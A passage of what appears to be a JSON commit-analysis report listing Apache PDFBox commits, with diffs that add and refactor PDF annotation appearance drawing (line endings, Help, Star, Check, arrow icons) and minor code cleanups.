PDAnnotationLine.LE_SQUARE:", - "+ cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", - "+ break;", - "+ case PDAnnotationLine.LE_CIRCLE:", - "+ addCircle(cs, x, y, width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_R_OPEN_ARROW:", - "+ case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "+ if (Float.compare(x, 0) != 0)", - " {", - "- case PDAnnotationLine.LE_OPEN_ARROW:", - "- case PDAnnotationLine.LE_CLOSED_ARROW:", - "- drawArrow(cs, lineLength - ab.width, y, -ab.width * 9);", - "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(endPointEndingStyle))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_BUTT:", - "- cs.moveTo(lineLength, y - ab.width * 3);", - "- cs.lineTo(lineLength, y + ab.width * 3);", - "- break;", - "- case PDAnnotationLine.LE_DIAMOND:", - "- drawDiamond(cs, lineLength, y, ab.width * 3);", - "- break;", - "- case PDAnnotationLine.LE_SQUARE:", - "- cs.addRect(lineLength - ab.width * 3, y - ab.width * 3, ab.width * 6, ab.width * 6);", - "- break;", - "- case PDAnnotationLine.LE_CIRCLE:", - "- addCircle(cs, lineLength, y, ab.width * 3);", - "- break;", - "- case PDAnnotationLine.LE_R_OPEN_ARROW:", - "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "- drawArrow(cs, lineLength + ab.width, y, ab.width * 9);", - "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(endPointEndingStyle))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_SLASH:", - "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "- cs.moveTo(lineLength + (float) (Math.cos(Math.toRadians(60)) * ab.width * 9),", - "- y + (float) (Math.sin(Math.toRadians(60)) * ab.width * 9));", - "- cs.lineTo(lineLength + (float) (Math.cos(Math.toRadians(240)) * ab.width * 9),", - "- y + (float) (Math.sin(Math.toRadians(240)) * ab.width * 9));", - "- break;", - "- default:", - "- break;", - "+ // ending", - "+ drawArrow(cs, x + width, y, width * 9);", - " }", - "- if (INTERIOR_COLOR_STYLES.contains(endPointEndingStyle))", - "+ else", - " {", - "- cs.drawShape(ab.width, hasStroke, hasBackground);", - "+ // start", - "+ drawArrow(cs, -width, y, -width * 9);", - " }", - "- else if (!PDAnnotationLine.LE_NONE.equals(endPointEndingStyle))", - "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", - " {", - "- // need to do this separately, because sometimes /IC is set anyway", - "- cs.drawShape(ab.width, hasStroke, false);", - "+ cs.closePath();", - " }", - "- }", - "+ break;", - "+ case PDAnnotationLine.LE_SLASH:", - "+ // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "+ cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", - "+ y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", - "+ cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", - "+ y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", - "+ break;", - "+ default:", - "+ break;", - " }", - "- catch (IOException ex)", - "+ if (INTERIOR_COLOR_STYLES.contains(style))", - " {", - "- LOG.error(ex);", - "+ cs.drawShape(width, hasStroke, hasBackground);", - "+ }", - "+ else if (!PDAnnotationLine.LE_NONE.equals(style))", - "+ {", - "+ // need to do this separately, because sometimes /IC is set anyway", - "+ cs.drawShape(width, hasStroke, false);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "67925623ac739bc262f3d0c30cbc6fbb175eba1e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528481576, - "hunks": 3, - "message": "PDFBOX-3353: add constant for /Circle git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833198 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "index 9576df314..7311feaec 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "@@ -71,2 +71,7 @@ public class PDAnnotationText extends PDAnnotationMarkup", - "+ /**", - "+ * Constant for the name of a circle annotation.", - "+ */", - "+ public static final String NAME_CIRCLE = \"Circle\";", - "+", - " /**", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index a4d003c6c..9f6772fab 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -55,3 +55,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", - "- !\"Circle\".equals(annotation.getName()))", - "+ !PDAnnotationText.NAME_CIRCLE.equals(annotation.getName()))", - " {", - "@@ -86,3 +86,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "- case \"Circle\": //TODO constant", - "+ case PDAnnotationText.NAME_CIRCLE:", - " drawCircles(contentStream, bbox);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "28bb54800e4339b0a1a44dce7b628ca77ba57bc9", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530117361, - "hunks": 3, - "message": "PDFBOX-3353: correct drawing of /Paragraph, no donut effect there git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834520 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 6cc503e4a..2a9eeabf6 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -342,3 +342,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- //TODO this is mostly identical to drawHelp, except for scale, translation and symbol", - " private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "@@ -380,5 +379,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.restoreGraphicsState();", - "- // draw the outer circle counterclockwise to fill area between circle and \"?\"", - "- drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - " contentStream.fillAndStroke();", - "+ drawCircle(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.stroke();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "ff7eec4f24f6ec5aafa58ec11f9a0f6901bda5b7", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530728360, - "hunks": 1, - "message": "PDFBOX-4071: remove unused import git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835075 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "index ec521ad01..69d9e6384 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "@@ -20,3 +20,2 @@ import java.awt.geom.GeneralPath;", - " import java.io.File;", - "-import java.io.FileInputStream;", - " import java.io.IOException;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "d227e0f677b3244c1f39dcd6c58e19993feea58e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528632673, - "hunks": 10, - "message": "PDFBOX-3353: support /Help git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833278 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index aeaf70abe..41e9a55b1 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -17,3 +17,8 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "+import java.awt.geom.AffineTransform;", - "+import java.awt.geom.GeneralPath;", - "+import java.awt.geom.PathIterator;", - " import java.io.IOException;", - "+import java.util.HashSet;", - "+import java.util.Set;", - " import org.apache.commons.logging.Log;", - "@@ -22,2 +27,3 @@ import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.font.PDType1Font;", - " import org.apache.pdfbox.pdmodel.graphics.blend.BlendMode;", - "@@ -27,2 +33,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationText;", - "+import org.apache.pdfbox.util.Matrix;", - "@@ -36,2 +43,13 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private static final Set SUPPORTED_NAMES = new HashSet<>();", - "+", - "+ static", - "+ {", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_NOTE);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_INSERT);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CROSS);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_HELP);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CIRCLE);", - "+ }", - "+", - " public PDTextAppearanceHandler(PDAnnotation annotation)", - "@@ -53,8 +71,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " PDAnnotationText annotation = (PDAnnotationText) getAnnotation();", - "- if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()) &&", - "- !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", - "- !PDAnnotationText.NAME_CROSS.equals(annotation.getName()) &&", - "- !PDAnnotationText.NAME_CIRCLE.equals(annotation.getName()))", - "+ if (!SUPPORTED_NAMES.contains(annotation.getName()))", - " {", - "- //TODO Comment, Key, Help, NewParagraph, Paragraph", - "+ //TODO Comment, Key, NewParagraph, Paragraph", - " return;", - "@@ -77,3 +92,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " setOpacity(contentStream, annotation.getConstantOpacity());", - "- ", - "+", - " PDRectangle rect = getRectangle();", - "@@ -96,3 +111,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "-", - "+ case PDAnnotationText.NAME_HELP:", - "+ drawHelp(contentStream, bbox);", - "+ break;", - " default:", - "@@ -206,2 +223,70 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private void drawHelp(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ throws IOException", - "+ {", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ // Adobe first fills a white circle with CA ca 0.6, so do we", - "+ contentStream.saveGraphicsState();", - "+ contentStream.setLineWidth(1);", - "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", - "+ gs.setAlphaSourceFlag(false);", - "+ gs.setStrokingAlphaConstant(0.6f);", - "+ gs.setNonStrokingAlphaConstant(0.6f);", - "+ gs.setBlendMode(BlendMode.NORMAL);", - "+ contentStream.setGraphicsStateParameters(gs);", - "+ contentStream.setNonStrokingColor(1f);", - "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fill();", - "+ contentStream.restoreGraphicsState();", - "+", - "+ contentStream.saveGraphicsState();", - "+ // rescale so that \"?\" fits into circle and move \"?\" to circle center", - "+ // values gathered by trial and error", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 2.25f, 0.001f * min / 2.25f));", - "+ contentStream.transform(Matrix.getTranslateInstance(540, 375));", - "+", - "+ // we get the shape of an Helvetica \"?\" and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.HELVETICA.getPath(\"question\");", - "+ PathIterator it = path.getPathIterator(new AffineTransform());", - "+ double[] coords = new double[6];", - "+ while (!it.isDone())", - "+ {", - "+ int type = it.currentSegment(coords);", - "+ switch (type)", - "+ {", - "+ case PathIterator.SEG_CLOSE:", - "+ contentStream.closePath();", - "+ break;", - "+ case PathIterator.SEG_CUBICTO:", - "+ contentStream.curveTo((float) coords[0], (float) coords[1], (float) coords[2],", - "+ (float) coords[3], (float) coords[4], (float) coords[5]);", - "+ break;", - "+ case PathIterator.SEG_QUADTO:", - "+ contentStream.curveTo1((float) coords[0], (float) coords[1], (float) coords[2], (float) coords[3]);", - "+ // not sure whether curveTo1 or curveTo2 is to be used here", - "+ break;", - "+ case PathIterator.SEG_LINETO:", - "+ contentStream.lineTo((float) coords[0], (float) coords[1]);", - "+ break;", - "+ case PathIterator.SEG_MOVETO:", - "+ contentStream.moveTo((float) coords[0], (float) coords[1]);", - "+ break;", - "+ default:", - "+ break;", - "+ }", - "+ it.next();", - "+ }", - "+ contentStream.restoreGraphicsState();", - "+ // draw the outer circle counterclockwise to fill area between circle and \"?\"", - "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - " @Override" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "c124b3f87812f47614db0b620453ab7012167762", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524335986, - "hunks": 7, - "message": "PDFBOX-4189: Sonar fixes: use try-with-resources, use private constructor, reformat, use diamond git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829739 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "index 221549918..915cd09a4 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -41,2 +41,5 @@ public class BengaliPdfGenerationHelloWorld", - " {", - "+ private BengaliPdfGenerationHelloWorld()", - "+ { ", - "+ }", - "@@ -75,6 +78,4 @@ public class BengaliPdfGenerationHelloWorld", - "- PDDocument doc = new PDDocument();", - "- try", - "+ try (PDDocument doc = new PDDocument())", - " {", - "-", - " PDPage page1 = new PDPage();", - "@@ -86,21 +87,22 @@ public class BengaliPdfGenerationHelloWorld", - "- PDPageContentStream contents = new PDPageContentStream(doc, page1);", - "- contents.beginText();", - "- contents.setFont(font, 12);", - "- contents.newLineAtOffset(10, 750);", - "- contents.showText(BANGLA_TEXT_1);", - "- contents.newLineAtOffset(0, -50);", - "- contents.showText(BANGLA_TEXT_2);", - "- contents.newLineAtOffset(0, -30);", - "- contents.showText(BANGLA_TEXT_3);", - "- contents.endText();", - "-", - "- PDImageXObject pdImage = PDImageXObject", - "- .createFromFile(BengaliPdfGenerationHelloWorld.class", - "- .getResource(", - "- \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", - "- // getFile() doesn't work if there is a space in the path", - "- .toURI().getPath(), doc);", - "- contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", - "- contents.close();", - "+ try (PDPageContentStream contents = new PDPageContentStream(doc, page1))", - "+ {", - "+ contents.beginText();", - "+ contents.setFont(font, 12);", - "+ contents.newLineAtOffset(10, 750);", - "+ contents.showText(BANGLA_TEXT_1);", - "+ contents.newLineAtOffset(0, -50);", - "+ contents.showText(BANGLA_TEXT_2);", - "+ contents.newLineAtOffset(0, -30);", - "+ contents.showText(BANGLA_TEXT_3);", - "+ contents.endText();", - "+ ", - "+ PDImageXObject pdImage = PDImageXObject", - "+ .createFromFile(BengaliPdfGenerationHelloWorld.class", - "+ .getResource(", - "+ \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", - "+ // getFile() doesn't work if there is a space in the path", - "+ .toURI().getPath(), doc);", - "+ contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", - "+ }", - "@@ -108,6 +110,2 @@ public class BengaliPdfGenerationHelloWorld", - " }", - "- finally", - "- {", - "- doc.close();", - "- }", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "index 1986d0dbd..bdb8adc91 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "@@ -268,4 +268,3 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- subTables[i] = readLigatureSubstitutionSubtable(data,", - "- offset + subTableOffets[i]);", - "+ subTables[i] = readLigatureSubstitutionSubtable(data, offset + subTableOffets[i]);", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", - "index e24828d1b..41a5e652e 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", - "@@ -49,3 +49,3 @@ public class CompoundCharacterTokenizer", - " {", - "- List tokens = new ArrayList();", - "+ List tokens = new ArrayList<>();" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "570778fc1a920ba02d31dbeab671efe78a275f7b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529612758, - "hunks": 6, - "message": "PDFBOX-3353: support /Star, /Check, /RightArrow and /RightPointer git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834053 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "index 6d234de46..913c49a0e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "@@ -80,2 +80,22 @@ public class PDAnnotationText extends PDAnnotationMarkup", - " public static final String NAME_CROSS = \"Cross\";", - "+ ", - "+ /**", - "+ * Constant for the name of a star annotation.", - "+ */", - "+ public static final String NAME_STAR = \"Star\";", - "+", - "+ /**", - "+ * Constant for the name of a check annotation.", - "+ */", - "+ public static final String NAME_CHECK = \"Check\";", - "+", - "+ /**", - "+ * Constant for the name of a right arrow annotation.", - "+ */", - "+ public static final String NAME_RIGHT_ARROW = \"RightArrow\";", - "+", - "+ /**", - "+ * Constant for the name of a right pointer annotation.", - "+ */", - "+ public static final String NAME_RIGHT_POINTER = \"RightPointer\"; ", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 6211ffe18..5424c61b5 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -55,2 +55,6 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " SUPPORTED_NAMES.add(PDAnnotationText.NAME_NEW_PARAGRAPH);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CHECK);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_STAR);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_RIGHT_ARROW);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_RIGHT_POINTER);", - " }", - "@@ -122,2 +126,14 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "+ case PDAnnotationText.NAME_STAR:", - "+ drawStar(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_CHECK:", - "+ drawCheck(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_RIGHT_ARROW:", - "+ drawRightArrow(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_RIGHT_POINTER:", - "+ drawRightPointer(annotation, contentStream);", - "+ break;", - " default:", - "@@ -299,3 +315,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.transform(Matrix.getScaleInstance(0.001f * min / 2.25f, 0.001f * min / 2.25f));", - "- contentStream.transform(Matrix.getTranslateInstance(555, 375));", - "+ contentStream.transform(Matrix.getTranslateInstance(500, 375));", - "@@ -312,3 +328,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " //TODO this is mostly identical to drawHelp, except for scale, translation and symbol", - "- private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - " throws IOException", - "@@ -380,2 +396,112 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private void drawStar(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 19);", - "+", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 0.8f, 0.001f * min / 0.8f));", - "+", - "+ // we get the shape of a Zapf Dingbats star (0x2605) and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a35\");", - "+ addPath(contentStream, path);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ //TODO this is mostly identical to drawStar, except for scale, translation and symbol", - "+ private void drawCheck(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 19);", - "+", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 0.8f, 0.001f * min / 0.8f));", - "+ contentStream.transform(Matrix.getTranslateInstance(0, 50));", - "+", - "+ // we get the shape of a Zapf Dingbats check (0x2714) and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a20\");", - "+ addPath(contentStream, path);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ //TODO this is mostly identical to drawStar, except for scale, translation and symbol", - "+ private void drawRightPointer(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 17);", - "+", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 0.8f, 0.001f * min / 0.8f));", - "+ contentStream.transform(Matrix.getTranslateInstance(0, 50));", - "+", - "+ // we get the shape of a Zapf Dingbats right pointer (0x27A4) and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a174\");", - "+ addPath(contentStream, path);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ private void drawRightArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", - "+", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ 